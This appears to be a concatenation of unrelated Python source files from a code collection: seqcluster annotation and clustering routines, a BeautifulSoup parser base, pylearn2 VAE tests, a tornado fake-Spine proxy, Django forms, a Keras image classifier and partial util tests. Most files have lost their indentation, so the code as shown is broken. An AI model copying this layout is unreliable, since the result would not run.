data_ann_temp[dbi] = {dbi: [loci[lid].db_ann[dbi].ann[x].name for x in list(loci[lid].db_ann[dbi].ann.keys())]}
logger.debug("_json_: data_ann_temp %s %s" % (dbi, data_ann_temp[dbi]))
counts[dbi] += 1
# original Py 2.7 code
#data_ann = data_ann + map(lambda (x): data_ann_temp[x], data_ann_temp.keys())
# suggestion by 2to3
data_ann = data_ann + [data_ann_temp[x] for x in list(data_ann_temp.keys())]
logger.debug("_json_: data_ann %s" % data_ann)
counts = {k: v for k, v in iter(counts.items())}
total_loci = sum([counts[db] for db in counts])
valid_ann = [k for k, v in iter(counts.items()) if up_threshold(v, total_loci, 0.7)]
return data_ann, valid_ann
def _get_counts(list_seqs, seqs_obj, factor):
scaled = {}
seq = namedtuple('seq', 'freq norm_freq')
for s in list_seqs:
if s not in factor:
factor[s] = 1
samples = seqs_obj[s].norm_freq.keys()
corrected_norm = np.array(list(seqs_obj[s].norm_freq.values())) * factor[s]
corrected_raw = np.array(list(seqs_obj[s].freq.values())) * factor[s]
scaled[s] = seq(dict(zip(samples, corrected_raw)), dict(zip(samples, corrected_norm)))
return scaled
def _sum_by_samples(seqs_freq, samples_order):
"""
Sum sequences of a metacluster by samples.
"""
n = len(seqs_freq[list(seqs_freq.keys())[0]].freq.keys())
y = np.array([0] * n)
for s in seqs_freq:
x = seqs_freq[s].freq
exp = [seqs_freq[s].freq[sam] for sam in samples_order]
y = list(np.array(exp) + y)
return y
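# --- Hedged illustration (not part of the original code) ---
# _sum_by_samples with two toy sequences: per-sample counts are added element-wise
# in the order given by samples_order, so the result below is [4, 6].
def _example_sum_by_samples():
    toy = namedtuple('seq', 'freq norm_freq')
    seqs_freq = {'s1': toy({'a': 1, 'b': 2}, {}), 's2': toy({'a': 3, 'b': 4}, {})}
    return _sum_by_samples(seqs_freq, ['a', 'b'])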
def _annotate(args, setclus):
"""annotate transcriptional units with
gtf/bed files provided by -b/g option"""
logger.info("Creating bed file")
bedfile = generate_position_bed(setclus)
a = pybedtools.BedTool(bedfile, from_string=True)
beds = []
logger.info("Annotating clusters")
if hasattr(args, 'list_files'):
beds = args.list_files.split(",")
for filebed in beds:
logger.info("Using %s " % filebed)
db = os.path.basename(filebed)
b = pybedtools.BedTool(filebed)
c = a.intersect(b, wo=True)
setclus = anncluster(c, setclus, db, args.type_ann, args.feature_id)
return setclus
def _clean_alignment(args):
"""
Prepare alignment for cluster detection.
"""
logger.info("Clean bam file with highly repetitive reads with low counts. sum(counts)/n_hits > 1%")
bam_file, seq_obj = clean_bam_file(args.afile, args.mask)
logger.info("Using %s file" % bam_file)
detect_complexity(bam_file, args.ref, args.out)
return bam_file, seq_obj
def _create_clusters(seqL, bam_file, args):
"""
Cluster sequences and
create metaclusters with multi-mappers.
"""
clus_obj = []
cluster_file = op.join(args.out, "cluster.bed")
if not os.path.exists(op.join(args.out, 'list_obj.pk')):
if not file_exists(cluster_file):
logger.info("Parsing aligned file")
logger.info("Merging sequences")
bedtools = os.path.join(os.path.dirname(sys.executable), "bedtools")
bedtools = bedtools if os.path.exists(bedtools) else "bedtools"
parse_cmd = "awk '{i=i+1;print $1\"\\t\"$2\"\\t\"$3\"\\t\"$4\"\\t\"i\"\\t\"$6}'"
cmd = "{bedtools} bamtobed -i {bam_file} | {parse_cmd} | {bedtools} cluster -s -d 20 -i - > {cluster_file}"
do.run(cmd.format(**locals()))
c = pybedtools.BedTool(cluster_file)
logger.info("Creating clusters")
clus_obj = detect_clusters(c, seqL, args.min_seqs, args.non_un_gl)
with open(op.join(args.out, 'list_obj.pk'), 'wb') as output:
pickle.dump(clus_obj, output, pickle.HIGHEST_PROTOCOL)
else:
logger.info("Loading previous clusters")
with open(op.join(args.out, 'list_obj.pk'), 'rb') as input:
clus_obj = pickle.load(input)
# bedfile = pybedtools.BedTool(generate_position_bed(clus_obj), from_string=True)
# seqs_2_loci = bedfile.intersect(pybedtools.BedTool(aligned_bed, from_string=True), wo=True, s=True)
# seqs_2_position = add_seqs_position_to_loci(seqs_2_loci, seqL)
logger.info("%s clusters found" % (len(clus_obj.clusid)))
return clus_obj
def _cleaning(clusL, path):
"""
    Reduce loci into meta-clusters, or load a previously saved reduction and jump to the next step
"""
backup = op.join(path, "list_obj_red.pk")
if not op.exists(backup):
clus_obj = reduceloci(clusL, path)
with open(backup, 'wb') as output:
pickle.dump(clus_obj, output, pickle.HIGHEST_PROTOCOL)
return clus_obj
else:
logger.info("Loading previous reduced clusters")
with open(backup, 'rb') as in_handle:
clus_obj = pickle.load(in_handle)
return clus_obj
def _create_json(clusL, args):
clus = clusL.clus
seqs = clusL.seq
loci = clusL.loci
data_clus = {}
out_count = os.path.join(args.dir_out, "counts.tsv")
out_single_count = os.path.join(args.dir_out, "counts_sequence.tsv")
out_size = os.path.join(args.dir_out, "size_counts.tsv")
out_bed = os.path.join(args.dir_out, "positions.bed")
samples_order = list(seqs[list(seqs.keys())[1]].freq.keys())
with open(out_count, 'w') as matrix, open(out_size, 'w') as size_matrix, open(out_bed, 'w') as out_bed, open(out_single_count, 'w') as matrix_single:
matrix.write("id\tnloci\tann\t%s\n" % "\t".join(samples_order))
matrix_single.write("id\tann\tsequence\t%s\n" % "\t".join(samples_order))
for cid in clus:
seqList = []
c = clus[cid]
seqList = _get_seqs(c)
logger.debug("_json_: %s" % seqList)
data_ann, valid_ann = _get_annotation(c, loci)
data_loci = best_precursor(c, loci)
idloci, chrom, s, e, st, size = data_loci[0]
annotation = valid_ann[0] if valid_ann else "none"
bed_line = "%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (chrom, s, e, annotation, cid, st, len(seqList))
out_bed.write(bed_line)
# original Py 2.7 code
#data_seqs = map(lambda (x): {x: seqs[x].seq}, seqList)
# proposal by 2to3
data_seqs = [{x: seqs[x].seq} for x in seqList]
scaled_seqs = _get_counts(seqList, seqs, c.idmembers)
# original Py 2.7 code
#data_freq = map(lambda (x): scaled_seqs[x].freq, seqList)
#data_freq_w_id = map(lambda (x): {x: scaled_seqs[x].norm_freq}, seqList)
#data_len = map(lambda (x): seqs[x].len, seqList)
# proposal by 2to3
data_freq = [scaled_seqs[x].freq for x in seqList]
data_freq_w_id = [{x: scaled_seqs[x].norm_freq} for x in seqList]
data_len = [seqs[x].len for x in seqList]
sum_freq = _sum_by_samples(scaled_seqs, samples_order)
data_ann_str = [["%s::%s" % (name, ",".join(features)) for name, features in iter(k.items())] for k in data_ann]
data_valid_str = " ".join(valid_ann)
for s in seqList:
f = [seqs[s].freq[so] for so in samples_order]
if f.count(0) > 0.1 * len(f) and len(f) > 9:
continue
f = map(str, f)
print("\t".join([str(cid), data_valid_str, seqs[s].seq, "\t".join(f)]), file=matrix_single, end="\n")
matrix.write("%s\t%s\t%s|%s\t%s\n" % (cid, c.toomany, data_valid_str, ";".join([";".join(d) for d in data_ann_str]), "\t".join(map(str, sum_freq))))
size_matrix.write(_write_size_table(data_freq, data_len, data_valid_str, cid))
data_string = {'seqs': data_seqs, 'freq': data_freq_w_id,
'loci': data_loci, 'ann': data_ann,
'valid': valid_ann, 'peaks': clus[cid].peaks}
data_clus[cid] = data_string
out_file = os.path.join(args.dir_out, "seqcluster.json")
# import pdb; pdb.set_trace()
with open(out_file, 'w') as handle_out:
# https://stackoverflow.com/a/50577730/1772223
def default(o):
if isinstance(o, np.int64): return int(o)
raise TypeError
handle_out.write(json.dumps([data_clus], default=default, skipkeys=True, indent=2))
return out_file
|
11548020
|
from __future__ import annotations
from abc import ABC, abstractmethod
from types import TracebackType
from typing import Optional, Type
from bs4 import BeautifulSoup
class ParserBase(ABC):
"""
Base class for parsers
"""
@abstractmethod
def __enter__(self) -> ParserBase:
"""Context manager __enter__"""
pass
@abstractmethod
def __exit__(
self, exc_type: Optional[Type[BaseException]], exc_val: Optional[BaseException], exc_tb: Optional[TracebackType]
) -> bool:
"""Context manager __exit__"""
pass
@abstractmethod
def parse(self, url: str) -> dict:
"""Main function used to parse the article from a URL"""
pass
@staticmethod
def fix_blockquotes(html: str) -> str:
"""Mobi doesn't seem to deal well with <p> tags inside <blockquote> tags. So we replace <p> with <div>"""
soup = BeautifulSoup(html, "html.parser")
for quote in soup.find_all("blockquote"):
if not quote.p:
continue
quote.p.wrap(soup.new_tag("div")) # Wrap all <p> elements with <div>
quote.p.unwrap() # Unwrap removes the element and replaces it with its content
return soup.decode()
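# --- Hedged usage sketch (not part of the original module) ---
# fix_blockquotes in action on a minimal snippet: the <p> inside the <blockquote>
# is replaced by a <div>, which Mobi renders more reliably.
def example_fix_blockquotes() -> str:
    html = "<blockquote><p>quoted text</p></blockquote>"
    return ParserBase.fix_blockquotes(html)  # '<blockquote><div>quoted text</div></blockquote>'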
|
11548123
|
from nose.tools import raises
import os
import numpy
import theano
import theano.tensor as T
from pylearn2.compat import OrderedDict
from pylearn2.config import yaml_parse
from pylearn2.models.mlp import (
MLP, Linear, CompositeLayer, ConvRectifiedLinear, SpaceConverter
)
from pylearn2.models.vae import VAE
from pylearn2.models.vae.kl import DiagonalGaussianPriorPosteriorKL
from pylearn2.models.vae.prior import Prior, DiagonalGaussianPrior
from pylearn2.models.vae.conditional import (
Conditional,
BernoulliVector,
DiagonalGaussian
)
from pylearn2.space import CompositeSpace, VectorSpace, Conv2DSpace
from pylearn2.utils.rng import make_np_rng
from pylearn2.utils import as_floatX
from pylearn2.utils import testing
class DummyVAE(object):
rng = make_np_rng(default_seed=11223)
batch_size = 100
class DummyPrior(Prior):
def initialize_parameters(self, *args, **kwargs):
self._params = []
class DummyConditional(Conditional):
def _get_default_output_layer(self):
return CompositeLayer(layer_name='composite',
layers=[Linear(layer_name='1', dim=self.ndim,
irange=0.01),
Linear(layer_name='2', dim=self.ndim,
irange=0.01)])
def _get_required_mlp_output_space(self):
return CompositeSpace([VectorSpace(dim=self.ndim),
VectorSpace(dim=self.ndim)])
###############################################################################
# models/vae/prior.py tests
###############################################################################
# -------------------------------- Prior --------------------------------------
def test_prior_set_vae():
"""
Prior.set_vae adds a reference to the vae and adopts the vae's rng
and batch_size attributes
"""
prior = DummyPrior()
vae = DummyVAE()
prior.set_vae(vae)
testing.assert_same_object(prior.vae, vae)
testing.assert_same_object(prior.rng, vae.rng)
testing.assert_equal(prior.batch_size, vae.batch_size)
@raises(RuntimeError)
def test_prior_raises_exception_if_called_twice():
"""
Prior.set_vae raises an exception if it has already been called
"""
prior = DummyPrior()
vae = DummyVAE()
prior.set_vae(vae)
prior.set_vae(vae)
def test_prior_get_vae():
"""
Prior.get_vae returns its VAE
"""
prior = DummyPrior()
vae = DummyVAE()
prior.set_vae(vae)
testing.assert_same_object(prior.get_vae(), vae)
# ------------------------- DiagonalGaussianPrior -----------------------------
def test_diagonal_gaussian_prior_initialize_parameters():
"""
DiagonalGaussianPrior.initialize_parameters works without crashing
"""
prior = DiagonalGaussianPrior()
vae = DummyVAE()
prior.set_vae(vae)
prior.initialize_parameters(nhid=5)
def test_diagonal_gaussian_prior_sample_from_p_z():
"""
DiagonalGaussianPrior.sample_from_p_z works without crashing
"""
prior = DiagonalGaussianPrior()
vae = DummyVAE()
prior.set_vae(vae)
prior.initialize_parameters(nhid=5)
prior.sample_from_p_z(10)
def test_diagonal_gaussian_prior_log_p_z():
"""
DiagonalGaussianPrior.log_p_z works without crashing
"""
prior = DiagonalGaussianPrior()
vae = DummyVAE()
prior.set_vae(vae)
prior.initialize_parameters(nhid=5)
z = T.tensor3('z')
prior.log_p_z(z)
###############################################################################
# models/vae/conditional.py tests
###############################################################################
# ----------------------------- Conditional -----------------------------------
@raises(ValueError)
def test_conditional_requires_nested_mlp():
"""
Conditional rejects non-nested MLPs
"""
mlp = MLP(nvis=10, layers=[Linear(layer_name='h', dim=10, irange=0.01)])
Conditional(mlp=mlp, name='conditional')
@raises(ValueError)
def test_conditional_rejects_invalid_output_layer():
"""
Conditional rejects invalid user-defined output layer
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01),
Linear(layer_name='mu', dim=5, irange=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional',
output_layer_required=False)
vae = DummyVAE()
conditional.set_vae(vae)
conditional.initialize_parameters(input_space=VectorSpace(dim=5), ndim=5)
def test_conditional_returns_mlp_weights():
"""
Conditional.get_weights calls its MLP's get_weights method
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
conditional.initialize_parameters(input_space=VectorSpace(dim=5), ndim=5)
numpy.testing.assert_equal(conditional.get_weights(), mlp.get_weights())
def test_conditional_returns_lr_scalers():
"""
Conditional.get_lr_scalers calls its MLP's get_lr_scalers method
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
W_lr_scale=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
conditional.initialize_parameters(input_space=VectorSpace(dim=5), ndim=5)
testing.assert_equal(conditional.get_lr_scalers(), mlp.get_lr_scalers())
def test_conditional_modify_updates():
"""
Conditional.modify_updates calls its MLP's modify_updates method
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
conditional.initialize_parameters(input_space=VectorSpace(dim=5), ndim=5)
updates = OrderedDict(zip(mlp.get_params(), mlp.get_params()))
testing.assert_equal(conditional.modify_updates(updates),
mlp.modify_updates(updates))
def test_conditional_set_vae():
"""
Conditional.set_vae adds a reference to the vae and adopts the vae's rng
and batch_size attributes
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
testing.assert_same_object(conditional.vae, vae)
testing.assert_same_object(conditional.rng, vae.rng)
testing.assert_equal(conditional.batch_size, vae.batch_size)
@raises(RuntimeError)
def test_conditional_raises_exception_if_called_twice():
"""
Conditional.set_vae raises an exception if it has already been called
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
conditional.set_vae(vae)
def test_conditional_get_vae():
"""
Conditional.get_vae returns its VAE
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
testing.assert_same_object(conditional.get_vae(), vae)
def test_conditional_initialize_parameters():
"""
Conditional.initialize_parameters does the following:
* Set its input_space and ndim attributes
* Calls its MLP's set_mlp method
* Sets its MLP's input_space
* Validates its MLP
* Sets its params and param names
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
testing.assert_same_object(input_space, conditional.input_space)
testing.assert_equal(conditional.ndim, 5)
testing.assert_same_object(mlp.get_mlp(), conditional)
testing.assert_same_object(mlp.input_space, input_space)
mlp_params = mlp.get_params()
conditional_params = conditional.get_params()
assert all([mp in conditional_params for mp in mlp_params])
assert all([cp in mlp_params for cp in conditional_params])
def test_conditional_encode_conditional_parameters():
"""
Conditional.encode_conditional_parameters calls its MLP's fprop method
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
X = T.matrix('X')
mlp_Y1, mlp_Y2 = mlp.fprop(X)
cond_Y1, cond_Y2 = conditional.encode_conditional_params(X)
f = theano.function([X], [mlp_Y1, mlp_Y2, cond_Y1, cond_Y2])
rval = f(as_floatX(numpy.random.uniform(size=(10, 5))))
numpy.testing.assert_allclose(rval[0], rval[2])
numpy.testing.assert_allclose(rval[1], rval[3])
# ----------------------------- BernoulliVector -------------------------------
def test_bernoulli_vector_default_output_layer():
"""
BernoulliVector's default output layer is compatible with its required
output space
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = BernoulliVector(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
def test_bernoulli_vector_sample_from_conditional():
"""
BernoulliVector.sample_from_conditional works when num_samples is provided
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = BernoulliVector(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
conditional.sample_from_conditional([mu], num_samples=2)
@raises(ValueError)
def test_bernoulli_vector_reparametrization_trick():
"""
BernoulliVector.sample_from_conditional raises an error when asked to
sample using the reparametrization trick
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = BernoulliVector(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
epsilon = T.tensor3('epsilon')
conditional.sample_from_conditional([mu], epsilon=epsilon)
def test_bernoulli_vector_conditional_expectation():
"""
BernoulliVector.conditional_expectation doesn't crash
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = BernoulliVector(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
conditional.conditional_expectation([mu])
def test_bernoulli_vector_log_conditional():
"""
BernoulliVector.log_conditional doesn't crash
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = BernoulliVector(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
samples = T.tensor3('samples')
conditional.log_conditional(samples, [mu])
# ---------------------------- DiagonalGaussian -------------------------------
def test_diagonal_gaussian_default_output_layer():
"""
DiagonalGaussian's default output layer is compatible with its required
output space
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DiagonalGaussian(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
def test_diagonal_gaussian_sample_from_conditional():
"""
DiagonalGaussian.sample_from_conditional works when num_samples is provided
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DiagonalGaussian(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
log_sigma = T.matrix('log_sigma')
conditional.sample_from_conditional([mu, log_sigma], num_samples=2)
def test_diagonal_gaussian_reparametrization_trick():
"""
DiagonalGaussian.sample_from_conditional works when asked to sample using
the reparametrization trick
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DiagonalGaussian(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
log_sigma = T.matrix('log_sigma')
epsilon = T.tensor3('epsilon')
conditional.sample_from_conditional([mu, log_sigma], epsilon=epsilon)
def test_diagonal_gaussian_conditional_expectation():
"""
DiagonalGaussian.conditional_expectation doesn't crash
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DiagonalGaussian(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
log_sigma = T.matrix('log_sigma')
conditional.conditional_expectation([mu, log_sigma])
def test_diagonal_gaussian_log_conditional():
"""
DiagonalGaussian.log_conditional doesn't crash
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DiagonalGaussian(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
log_sigma = T.matrix('log_sigma')
samples = T.tensor3('samples')
conditional.log_conditional(samples, [mu, log_sigma])
def test_diagonal_gaussian_sample_from_epsilon():
"""
DiagonalGaussian.sample_from_epsilon doesn't crash
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DiagonalGaussian(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
conditional.sample_from_epsilon((2, 10, 5))
###############################################################################
# models/vae/__init__.py tests
###############################################################################
def test_one_sample_allowed():
"""
VAE allows one sample per data point
"""
encoding_model = MLP(layers=[Linear(layer_name='h', dim=10, irange=0.01)])
decoding_model = MLP(layers=[Linear(layer_name='h', dim=10, irange=0.01)])
prior = DiagonalGaussianPrior()
conditional = BernoulliVector(mlp=decoding_model, name='conditional')
posterior = DiagonalGaussian(mlp=encoding_model, name='posterior')
vae = VAE(nvis=10, prior=prior, conditional=conditional,
posterior=posterior, nhid=5)
X = T.matrix('X')
lower_bound = vae.log_likelihood_lower_bound(X, num_samples=1)
f = theano.function(inputs=[X], outputs=lower_bound)
rng = make_np_rng(default_seed=11223)
f(as_floatX(rng.uniform(size=(10, 10))))
def test_multiple_samples_allowed():
"""
VAE allows multiple samples per data point
"""
encoding_model = MLP(layers=[Linear(layer_name='h', dim=10, irange=0.01)])
decoding_model = MLP(layers=[Linear(layer_name='h', dim=10, irange=0.01)])
prior = DiagonalGaussianPrior()
conditional = BernoulliVector(mlp=decoding_model, name='conditional')
posterior = DiagonalGaussian(mlp=encoding_model, name='posterior')
vae = VAE(nvis=10, prior=prior, conditional=conditional,
posterior=posterior, nhid=5)
X = T.matrix('X')
lower_bound = vae.log_likelihood_lower_bound(X, num_samples=10)
f = theano.function(inputs=[X], outputs=lower_bound)
rng = make_np_rng(default_seed=11223)
f(as_floatX(rng.uniform(size=(10, 10))))
def test_convolutional_compatible():
"""
VAE allows convolutional encoding networks
"""
encoding_model = MLP(
layers=[
SpaceConverter(
layer_name='conv2d_converter',
output_space=Conv2DSpace(shape=[4, 4], num_channels=1)
),
ConvRectifiedLinear(
layer_name='h',
output_channels=2,
kernel_shape=[2, 2],
kernel_stride=[1, 1],
pool_shape=[1, 1],
pool_stride=[1, 1],
pool_type='max',
irange=0.01)
]
)
decoding_model = MLP(layers=[Linear(layer_name='h', dim=16, irange=0.01)])
prior = DiagonalGaussianPrior()
conditional = BernoulliVector(mlp=decoding_model, name='conditional')
posterior = DiagonalGaussian(mlp=encoding_model, name='posterior')
vae = VAE(nvis=16, prior=prior, conditional=conditional,
posterior=posterior, nhid=16)
X = T.matrix('X')
lower_bound = vae.log_likelihood_lower_bound(X, num_samples=10)
f = theano.function(inputs=[X], outputs=lower_bound)
rng = make_np_rng(default_seed=11223)
f(as_floatX(rng.uniform(size=(10, 16))))
def test_vae_automatically_finds_kl_integrator():
"""
VAE automatically finds the right KLIntegrator
"""
encoding_model = MLP(layers=[Linear(layer_name='h', dim=10, irange=0.01)])
decoding_model = MLP(layers=[Linear(layer_name='h', dim=10, irange=0.01)])
prior = DiagonalGaussianPrior()
conditional = BernoulliVector(mlp=decoding_model, name='conditional')
posterior = DiagonalGaussian(mlp=encoding_model, name='posterior')
vae = VAE(nvis=10, prior=prior, conditional=conditional,
posterior=posterior, nhid=5)
assert (vae.kl_integrator is not None and
isinstance(vae.kl_integrator, DiagonalGaussianPriorPosteriorKL))
###############################################################################
# costs/vae.py tests
###############################################################################
def test_VAE_cost():
"""
VAE trains properly with the VAE cost
"""
yaml_src_path = os.path.join(os.path.dirname(__file__),
'test_vae_cost_vae_criterion.yaml')
train_object = yaml_parse.load_path(yaml_src_path)
train_object.main_loop()
def test_IS_cost():
"""
VAE trains properly with the importance sampling cost
"""
yaml_src_path = os.path.join(os.path.dirname(__file__),
'test_vae_cost_is_criterion.yaml')
train_object = yaml_parse.load_path(yaml_src_path)
train_object.main_loop()
|
11548170
|
from utilities import integration_adaptors_logger as log
import tornado.web
from tornado import httpclient
from fake_spine.certs import Certs
from fake_spine import fake_spine_configuration
logger = log.IntegrationAdaptorsLogger(__name__)
class InboundProxyRequestHandler(tornado.web.RequestHandler):
def initialize(self, inbound_certs: Certs) -> None:
self.inbound_certs = inbound_certs
self.config = fake_spine_configuration.FakeSpineConfiguration()
async def post(self):
logger.info(f"request accepted {self.request} with headers: {self.request.headers}, and body: {self.request.body}")
logger.info(f"request being proxied to inbound service")
response = await httpclient.AsyncHTTPClient()\
.fetch(self.config.INBOUND_SERVER_BASE_URL,
raise_error=False,
method="POST",
body=self.request.body,
headers=self.request.headers,
client_cert=self.inbound_certs.local_cert_path,
client_key=self.inbound_certs.private_key_path,
ca_certs=self.inbound_certs.ca_certs_path,
validate_cert=self.config.FAKE_SPINE_PROXY_VALIDATE_CERT)
logger.info(f"inbound responded with code: {response.code} and body: {response.body}")
self.set_status(response.code)
self.write(response.body)
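# --- Hedged sketch (not part of the original module) ---
# One way this handler could be wired into a tornado application; the route and
# helper name below are illustrative assumptions.
def make_example_app(inbound_certs: Certs) -> tornado.web.Application:
    return tornado.web.Application([
        (r"/inbound-proxy", InboundProxyRequestHandler, dict(inbound_certs=inbound_certs)),
    ])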
|
11548194
|
from django import forms
from author_review.models import *
class ArticleForm(forms.Form):
title = forms.CharField(label="题目", max_length=80, widget=forms.TextInput(attrs={'class': 'form-control'}))
abstract = forms.CharField(label="摘要", widget=forms.Textarea)
key = forms.CharField(label="关键词", max_length=100, widget=forms.TextInput(attrs={'class': 'form-control'}))
content = forms.CharField(label="主题", widget=forms.Textarea)
category = forms.CharField(label="类别", widget=forms.TextInput(attrs={'class': 'form-control'}))
# article_address = forms.FileField(label="文章的文件地址")
writers = forms.CharField(label="作者", widget=forms.TextInput(attrs={'class': 'form-control'}))
class RemarkForm(forms.Form):
review_name = forms.CharField(label="审稿人用户名", max_length=128, widget=forms.TextInput(attrs={'class': 'form-control'}))
article_id = forms.IntegerField(label="文章ID", widget=forms.TextInput(attrs={'class': 'form-control'}))
author_review = forms.CharField(label="评论", widget=forms.Textarea)
class UploadArticleForm(forms.ModelForm):
    class Meta:
        model = Article
        fields = ['article_address']
|
11548222
|
import numpy as np
from keras.models import Sequential, load_model
from keras.layers import Input, Dropout, Flatten, Conv2D, MaxPooling2D, Dense, Activation
from keras.optimizers import SGD
from keras.utils import np_utils
from keras.preprocessing.image import ImageDataGenerator
from keras.callbacks import TensorBoard
import itertools
# all images will be converted to this size
ROWS = 256
COLS = 256
CHANNELS = 3
train_image_generator = ImageDataGenerator(horizontal_flip=True, rescale=1./255, rotation_range=45)
test_image_generator = ImageDataGenerator(horizontal_flip=False, rescale=1./255, rotation_range=0)
train_generator = train_image_generator.flow_from_directory('train', target_size=(ROWS, COLS), class_mode='categorical')
test_generator = test_image_generator.flow_from_directory('test', target_size=(ROWS, COLS), class_mode='categorical')
train_generator.reset()
test_generator.reset()
model = Sequential()
model.add(Conv2D(64, (3,3), input_shape=(ROWS, COLS, CHANNELS)))
model.add(Activation('relu'))
model.add(Conv2D(64, (3,3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(4,4)))
model.add(Conv2D(64, (3,3)))
model.add(Activation('relu'))
model.add(Conv2D(64, (3,3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(4,4)))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(400))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(200))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adamax', metrics=['accuracy'])
model.summary()
tensorboard = TensorBoard(log_dir='./logs/custom')
model.fit_generator(train_generator, steps_per_epoch=512, epochs=10, callbacks=[tensorboard], verbose=2)
print(model.evaluate_generator(test_generator, steps=1000))
|
11548253
|
import unittest
from util import *
from dateutil.parser import parse as parse_date
class TestUtil(unittest.TestCase):
def setUp(self):
pass
    def test_merge_two_dicts(self):
        result = merge_two_dicts({'a': 1}, {'b': 2})
        self.assertEqual(result, {'a': 1, 'b': 2})
    def test_weekdays_between(self):
        noon_friday = parse_date('2017-03-31T12:00:00Z')
        noon_monday = parse_date('2017-04-03T12:00:00Z')
        noon_tuesday = parse_date('2017-04-04T12:00:00Z')
        self.assertEqual(weekdays_between(noon_friday, noon_friday), 0.0)
        self.assertEqual(weekdays_between(noon_friday, noon_monday), 1.0)
        self.assertEqual(weekdays_between(noon_monday, noon_tuesday), 1.0)
        self.assertEqual(
            weekdays_between(parse_date('2017-06-03T00:12:02Z'), parse_date('2017-06-11T00:02:23Z')),
            5.0
        )
    def test_flatten(self):
        self.assertEqual(flatten([[1], [2]]), [1, 2])
    def test_recursive_get(self):
